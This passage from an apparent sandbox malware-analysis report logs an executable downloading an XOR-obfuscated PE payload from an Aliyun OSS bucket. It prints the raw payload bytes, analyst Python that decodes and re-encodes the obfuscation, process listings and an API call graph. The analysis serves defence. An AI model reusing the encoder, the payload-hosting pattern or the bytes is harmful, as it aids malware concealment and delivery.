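    sniffed = sniff_mime(body)
    result = {"md5_etag_agree": content_md5_matches_etag(content_md5_b64, etag),
              "declared_type": content_type, "sniffed_type": sniffed,
              "type_mismatch": sniffed != content_type, "trailing_bytes": 0, "problems": []}
    if body.startswith(PNG_SIG):
        result["ihdr"] = parse_ihdr(body)
        result["trailing_bytes"], result["problems"] = png_trailing_bytes(body)
    return result


# First 33 bytes of b.gif, c.gif and d.gif exactly as dumped in the report above.
REPORT_PNG_HEAD = bytes.fromhex(
    "89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52"
    "00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8")

if __name__ == "__main__":
    print(parse_ihdr(REPORT_PNG_HEAD))
    print(assess_response("image/gif", "LKn0qwlwqliYnWbZRY+HAQ==",
                          '"2CA9F4AB0970AA58989D66D9458F8701"', REPORT_PNG_HEAD))
    print(png_trailing_bytes(build_png_with_payload(b"\xaa" * 64)))
```

Run against a complete capture of any of the three objects, `trailing_bytes` and `problems` tell the analyst whether the body is a PNG with data after IEND, a PNG with oversized chunks, or no longer a PNG at all; on the 33-byte prefix shown here the walk can only report truncation.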


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.8 | 49713 | 39.103.20.48 | 443 | 7668 | C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2025-01-07 03:15:47 UTC | 111 | OUT | GET /s.dat HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:48 UTC | 560 | IN | HTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:47 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 28272
                                Connection: close
                                x-oss-request-id: 677C9C638797BE3039CED6CE
                                Accept-Ranges: bytes
                                ETag: "B49BF11DC361D426B398BB8C06DCFBFC"
                                Last-Modified: Tue, 07 Jan 2025 03:15:41 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 2323535133252745928
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000113
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: tJvxHcNh1CazmLuMBtz7/A==
                                x-oss-server-time: 26
                                2025-01-07 03:15:48 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                2025-01-07 03:15:48 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                2025-01-07 03:15:48 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                2025-01-07 03:15:48 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                2025-01-07 03:15:48 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                2025-01-07 03:15:48 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                Data Ascii: ,$LDld=5}u]U
                                2025-01-07 03:15:48 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                2025-01-07 03:15:48 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 a6 ac 26 d6
                                Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS&
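The GET /s.dat response above is served as a 28,272-byte application/octet-stream attachment and does not begin with any recognisable file header, yet the first 128 bytes in the Data Raw line decode to a standard DOS header and stub once each 4-byte block is XORed with the last ciphertext byte of the block before it (0xB8 for the first block). The Python below is an added example, not code from the report or from the sample: the chaining rule is inferred by hand from those 128 bytes (it yields the MZ magic, e_lfarlc = 0x40, e_lfanew = 0xE8 and the "This program cannot be run in DOS mode." string) and is asserted only for that prefix; the encoder is included so the rule can be checked as a round trip. The ETag helper uses the fact that OSS reports the object MD5 twice, as hex in ETag and as base64 in Content-MD5, so a later re-download can be tied to the object the sandbox fetched.

```python
import base64
import struct

# First 128 bytes of the GET /s.dat response body, transcribed from the
# report's "Data Raw" line. The full object is 28,272 bytes; only this
# prefix has been checked against the rule implemented below.
S_DAT_PREFIX = bytes.fromhex(
    "f5e228b8 bbb8b8b8 bcb8b8b8 4747b8b8"
    "00b8b8b8 b8b8b8b8 f8b8b8b8 b8b8b8b8"
    "b8b8b8b8 b8b8b8b8 b8b8b8b8 b8b8b8b8"
    "b8b8b8b8 b8b8b8b8 b8b8b8b8 50b8b8b8"
    "b6a702b6 b602bf7b 5ac37a37 fa16635f"
    "362c7f2f 5d40485d 3c307d3e 5f505051"
    "25713334 1446415a 7a33347a 3e35295a"
    "37353e3f 11323235 11353535 35353535"
)

INITIAL_KEY = 0xB8  # key of block 0, read off the MZ bytes (0x4D ^ 0xF5)
BLOCK = 4


def _key_for(index: int, ct, initial_key: int) -> int:
    """Block 0 uses the fixed key; block n uses the last *ciphertext* byte of block n-1
    (an inferred rule; it is what the captured prefix decodes under)."""
    return initial_key if index < BLOCK else ct[(index // BLOCK) * BLOCK - 1]


def decode_chained_xor(ct: bytes, initial_key: int = INITIAL_KEY) -> bytes:
    """Recover plaintext from the chained-XOR form seen in s.dat."""
    return bytes(c ^ _key_for(i, ct, initial_key) for i, c in enumerate(ct))


def encode_chained_xor(pt: bytes, initial_key: int = INITIAL_KEY) -> bytes:
    """Inverse of decode_chained_xor; the key for each block comes from the
    ciphertext already produced, so encoding runs strictly left to right."""
    out = bytearray()
    for i, p in enumerate(pt):
        out.append(p ^ _key_for(i, out, initial_key))
    return bytes(out)


def dos_header_summary(image: bytes) -> dict:
    """Sanity-check a decoded buffer as a PE image: MZ magic, e_lfanew, DOS stub text."""
    if len(image) < 0x80 or image[:2] != b"MZ":
        raise ValueError("buffer does not start with an MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    start = image.find(b"This program", 0x40, 0x80)
    end = image.find(b".", start) + 1 if start >= 0 else start
    message = image[start:end].decode("ascii") if start >= 0 else ""
    return {"e_lfanew": e_lfanew, "dos_stub_message": message}


def etag_matches_content_md5(etag: str, content_md5_b64: str) -> bool:
    """OSS sends the same MD5 as hex (ETag) and base64 (Content-MD5); they must agree."""
    return base64.b64decode(content_md5_b64).hex().lower() == etag.strip('"').lower()


if __name__ == "__main__":
    decoded = decode_chained_xor(S_DAT_PREFIX)
    print(decoded.hex())
    print(dos_header_summary(decoded))
    print(encode_chained_xor(decoded) == S_DAT_PREFIX)
    # Headers from the s.dat response in the report
    print(etag_matches_content_md5('"B49BF11DC361D426B398BB8C06DCFBFC"',
                                   "tJvxHcNh1CazmLuMBtz7/A=="))
```

Carrying the same rule on by hand over the remainder of the 256-byte excerpt gives a Rich header, "PE\0\0" at offset 0xE8 and a machine field of 0x8664 (AMD64), which fits the 64-bit processes elsewhere in this report; whether the rule holds for the whole object, and what the decoded image does, cannot be established from the excerpt and is not claimed here.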


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.8 | 49714 | 39.103.20.48 | 443 | 7668 | C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2025-01-07 03:15:49 UTC | 111 | OUT | GET /s.jpg HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:49 UTC | 544 | IN | HTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:49 GMT
                                Content-Type: image/jpeg
                                Content-Length: 8299
                                Connection: close
                                x-oss-request-id: 677C9C65B2582235363FD723
                                Accept-Ranges: bytes
                                ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 692387538176721524
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                x-oss-server-time: 11
                                2025-01-07 03:15:49 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                2025-01-07 03:15:49 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                2025-01-07 03:15:49 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                Target ID:0
                                Start time:22:14:07
                                Start date:06/01/2025
                                Path:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\287438657364-7643738421.08.exe"
                                Imagebase:0x140000000
                                File size:30'886'912 bytes
                                MD5 hash:12771744B7DE8FFB1F0DDDF3AC8ED2F4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:22:15:48
                                Start date:06/01/2025
                                Path:C:\Users\user\Documents\O8xg2t.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Documents\O8xg2t.exe
                                Imagebase:0x140000000
                                File size:133'136 bytes
                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:7
                                Start time:22:15:50
                                Start date:06/01/2025
                                Path:C:\Users\user\Documents\O8xg2t.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Documents\O8xg2t.exe
                                Imagebase:0x140000000
                                File size:133'136 bytes
                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:9
                                Start time:22:16:01
                                Start date:06/01/2025
                                Path:C:\Users\user\Documents\O8xg2t.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Documents\O8xg2t.exe
                                Imagebase:0x140000000
                                File size:133'136 bytes
                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false


                                  Execution Graph

                                  Execution Coverage:2.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:30.8%
                                  Total number of Nodes:480
                                  Total number of Limit Nodes:7
                                  execution_graph (interactive node/edge dump condensed; graph node IDs omitted). Functions to which the graph attributes Windows API calls, by address in the main image (base 0x140000000) and in a module mapped at 0x7ffbc320xxxx:

                                  Main image, service install/remove path (reached from 0x140001520):
                                  0x140001430  GetModuleFileNameW, OpenSCManagerW -> 0x140001482 CreateServiceW -> CloseServiceHandle (GetLastError on failure)
                                  0x140001595  OpenSCManagerW -> 0x1400015cf OpenServiceW -> 0x140001611 DeleteService -> CloseServiceHandle, CloseServiceHandle (GetLastError on failure)
                                  0x140001669  StartServiceCtrlDispatcherW
                                  0x1400011f0 -> 0x140001238 MessageBoxW -> 0x140004f30 -> 0x140006f95 NtAllocateVirtualMemory

                                  Main image, file read and thread start:
                                  0x140005e84  CreateFileA -> 0x140005fc3 malloc, ReadFile
                                  0x140013670  InitializeCriticalSection, CreateEventW (x3) -> 0x1400054e0 -> 0x1400074d0 LdrLoadDll -> 0x1400074f0 LdrLoadDll -> 0x140005561 CreateThread (0x1400055b0 GetLastError) -> 0x1400055c0 sprintf_s
                                  0x1400073e0  LdrLoadDll, called from many helpers; 0x14000f03b LoadLibraryA -> GetProcAddress; 0x140008510 GetModuleHandleA -> GetProcAddress -> ExitProcess

                                  Main image, CRT start-up from 0x140005a70: GetStartupInfoW, GetProcessHeap, HeapAlloc, GetVersionExA, HeapFree, HeapCreate, HeapSetInformation, GetStartupInfoA, GetStdHandle, GetFileType, SetHandleCount, WriteFile, GetModuleFileNameA, GetModuleFileNameW, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, Sleep, HeapReAlloc, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, GetLastError

                                  Module at 0x7ffbc32011b0: C++ exception and CRT helpers (BuildCatchObjectHelperInternal, Concurrency::cancel_current_task, __std_exception_copy, _invalid_parameter_noinfo, _invalid_parameter_noinfo_noreturn, __free_lconv_mon), HeapFree, GetLastError
WriteFile 14347 14000caf6 GetLastError 14346->14347 14346->14348 14347->14342 14347->14348 14348->14341 14348->14342 14348->14346 14349 14000c649 WideCharToMultiByte 14349->14342 14350 14000c68c WriteFile 14349->14350 14350->14352 14353 14000c80d GetLastError 14350->14353 14351 14000c829 GetLastError 14351->14342 14352->14342 14352->14349 14352->14351 14354 14000fd50 7 API calls sprintf_s 14352->14354 14355 14000c6e2 WriteFile 14352->14355 14357 14000c81b GetLastError 14352->14357 14353->14342 14354->14352 14355->14352 14356 14000c7ff GetLastError 14355->14356 14356->14342 14357->14342 14360 14000b41e 14359->14360 14361 14000b42f EnterCriticalSection 14359->14361 14365 14000b2f0 14360->14365 14363 14000b423 14363->14361 14364 1400084e0 _lock 12 API calls 14363->14364 14364->14361 14366 14000b317 14365->14366 14367 14000b32e 14365->14367 14368 140009540 _lock 12 API calls 14366->14368 14370 140008300 _lock 17 API calls 14367->14370 14377 14000b342 _lock 14367->14377 14369 14000b31c 14368->14369 14371 140009300 _lock 10 API calls 14369->14371 14372 14000b350 14370->14372 14373 14000b324 14371->14373 14375 14000b400 _lock 22 API calls 14372->14375 14372->14377 14374 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14373->14374 14374->14367 14376 14000b371 14375->14376 14378 14000b3a7 14376->14378 14379 14000b379 14376->14379 14377->14363 14381 140008de0 _lock HeapFree GetLastError 14378->14381 14380 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14379->14380 14382 14000b386 14380->14382 14385 14000b392 _lock 14381->14385 14384 140008de0 _lock HeapFree GetLastError 14382->14384 14382->14385 14383 14000b3b0 LeaveCriticalSection 14383->14377 14384->14385 14385->14383 14387 14000c20c sprintf_s 14386->14387 14388 14000c212 _lock 14387->14388 14389 14000c22c SetFilePointer 14387->14389 14388->14329 14390 14000c254 sprintf_s 14389->14390 14391 14000c24a GetLastError 14389->14391 14390->14329 14391->14390 13958 140006c95 13960 140006d7b 13958->13960 
13961 140006d9d 13958->13961 13959 140006f95 NtAllocateVirtualMemory 13959->13961 13960->13959 13960->13961 14393 1400054e0 14394 140005506 _lock 14393->14394 14395 14000552c 14393->14395 14406 1400074d0 14395->14406 14398 140008370 3 API calls 14402 140005545 _CreateFrameInfo 14398->14402 14399 1400055b8 14400 140008de0 _lock 2 API calls 14399->14400 14401 1400055c0 sprintf_s 14400->14401 14401->14394 14402->14399 14410 1400074f0 14402->14410 14405 1400055b0 GetLastError 14405->14399 14408 140007333 14406->14408 14407 140005536 14407->14398 14408->14407 14409 1400073e0 LdrLoadDll 14408->14409 14409->14408 14412 140007333 14410->14412 14411 140005561 CreateThread 14411->14401 14411->14405 14412->14411 14413 1400073e0 LdrLoadDll 14412->14413 14413->14412

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
